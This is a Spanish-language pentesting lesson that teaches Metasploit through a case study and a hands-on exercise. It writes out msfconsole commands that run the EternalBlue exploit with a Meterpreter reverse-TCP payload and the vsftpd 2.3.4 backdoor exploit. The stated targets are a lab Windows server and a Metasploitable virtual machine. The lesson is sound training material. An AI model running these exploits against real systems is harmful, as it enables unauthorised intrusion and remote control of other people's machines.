Usa Metasploit para Ataques Controlados

Lectura
25 min~3 min lectura

Concepto clave

Metasploit es un framework de penetración que automatiza el proceso de explotación de vulnerabilidades. Imagina que eres un cerrajero profesional: en lugar de probar cada llave manualmente, Metasploit es como un juego de llaves maestras que se adaptan a diferentes tipos de cerraduras (vulnerabilidades).

En el contexto de pentesting, Metasploit te permite ejecutar ataques controlados en entornos de prueba para validar si un sistema es vulnerable, sin causar daño real. Es como hacer un simulacro de incendio: pruebas las alarmas y procedimientos, pero no quemas el edificio.

Cómo funciona en la práctica

El flujo básico de Metasploit sigue estos pasos:

  1. Seleccionar un exploit: módulo que aprovecha una vulnerabilidad específica
  2. Configurar el payload: código que se ejecuta tras la explotación exitosa
  3. Establecer opciones: dirección IP objetivo, puerto, credenciales, etc.
  4. Ejecutar y obtener acceso

Ejemplo con datos reales:

ComponenteEjemploPropósito
Exploitwindows/smb/ms17_010_eternalblueAprovecha vulnerabilidad en SMB de Windows
Payloadwindows/meterpreter/reverse_tcpEstablece conexión reversa al atacante
OpcionesRHOST=192.168.1.100, LHOST=192.168.1.50Define objetivo y atacante

Caso de estudio

Escenario: Empresa de retail con servidor Windows Server 2012 sin parches. Como analista de seguridad, debes probar si es vulnerable al exploit EternalBlue.

Proceso realizado:

  1. Reconocimiento previo identificó sistema Windows con SMB habilitado
  2. En Metasploit: use exploit/windows/smb/ms17_010_eternalblue
  3. Configuración: set RHOST 10.0.0.25 y set LHOST 10.0.0.10
  4. Ejecución: exploit obteniendo sesión Meterpreter
  5. Documentación en informe: vulnerabilidad confirmada, recomendación de parche MS17-010
Importante: Este caso se ejecutó en laboratorio controlado con autorización por escrito. Nunca ejecutes en sistemas sin permiso.

Errores comunes

  • No verificar el entorno objetivo: Ejecutar exploits sin confirmar versión del sistema operativo o servicios activos. Solución: Siempre hacer reconocimiento con nmap o similar primero.
  • Configurar mal las opciones: Invertir RHOST (objetivo) y LHOST (atacante). Solución: Usar show options para verificar antes de ejecutar.
  • Olvidar el payload: Algunos exploits requieren payload explícito. Solución: Verificar con show payloads y seleccionar uno compatible.
  • No probar en entorno aislado primero: Saltar directamente a producción. Solución: Siempre probar en máquina virtual de laboratorio idéntica.
  • Ignorar los logs: No revisar mensajes de error de Metasploit. Solución: Leer cuidadosamente la salida en consola para debugging.

Checklist de dominio

  1. Puedo iniciar Metasploit Framework con msfconsole
  2. Sé buscar exploits con search por nombre o tipo de vulnerabilidad
  3. Puedo configurar correctamente RHOST, LHOST y puertos en un exploit
  4. Sé seleccionar y configurar payloads básicos como reverse_tcp
  5. Puedo ejecutar exploit y reconocer si fue exitoso
  6. Sé usar comandos básicos de Meterpreter como sysinfo y shell
  7. Documento todos los pasos para incluirlos en informe de seguridad

Explotación controlada de máquina virtual Metasploitable

En este ejercicio practicarás tu primer ataque controlado usando Metasploit contra una máquina de prueba.

  1. Prepara tu entorno:
    • Abre Kali Linux y lanza la terminal
    • Inicia Metasploit con: msfconsole
    • Asegúrate de tener la máquina Metasploitable 2 encendida en tu red local
  2. Identifica el objetivo:
    • Desde otra terminal, ejecuta: nmap -sV [IP_Metasploitable]
    • Anota los servicios y puertos abiertos (ej: vsftpd 2.3.4 en puerto 21)
  3. Selecciona y configura el exploit:
    • En msfconsole, busca exploits para vsftpd: search vsftpd
    • Usa el exploit: use exploit/unix/ftp/vsftpd_234_backdoor
    • Configura el objetivo: set RHOST [IP_Metasploitable]
    • Configura tu IP: set LHOST [tu_IP_Kali]
  4. Ejecuta y verifica:
    • Ejecuta el exploit: exploit
    • Si es exitoso, verás un prompt de shell (# o $)
    • Ejecuta whoami para confirmar acceso
  5. Documenta el proceso:
    • Toma capturas de cada paso
    • Anota los comandos usados exactamente
    • Registra el resultado final
Pistas
  • Si el exploit falla, verifica que la máquina Metasploitable tenga el servicio vsftpd activo con netstat
  • Asegúrate de que no hay firewalls bloqueando la conexión entre las máquinas virtuales
  • Usa show options para verificar todas las configuraciones antes de ejecutar exploit

Evalua tu comprension

Completa el quiz interactivo de arriba para ganar XP.